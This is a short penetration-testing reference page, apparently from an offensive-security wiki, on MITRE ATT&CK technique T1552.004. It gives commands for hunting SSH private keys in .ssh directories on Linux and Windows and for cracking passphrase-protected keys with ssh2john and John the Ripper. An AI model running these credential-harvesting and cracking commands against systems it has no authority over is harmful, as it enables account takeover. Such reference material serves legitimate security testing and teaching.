SSH Private Keys

MITRE ATT&CK™ Unsecured Credentials: Private Keys - T1552.004

Theory

We may search for SSH private key in publicly-exposed services (like webservers ore SMB shares) or in common directories if we gained access to the target.

Practice

Find Private Keys

We may find SSH keys in all .ssh directories using the find command.

find / -type d -name *.ssh -printf '%p\n' -exec ls -l {} \; 2>/dev/null

We may find SSH keys in C:\Users\(username)\.ssh\ directories.

dir C:\Users\(username)\.ssh\

Brute-Force Private Keys

If an SSH private key is password protected, in order to crack it we need to format this key to make John recognize it.

ssh2john private_key.txt > hash.txt
# or
python2 /usr/share/john/ssh2john.py private_key.txt > hash.txt

Crack the password of the private key using the formatted text.

#John
john --wordlist=wordlist.txt hash.txt

Last updated 6 months ago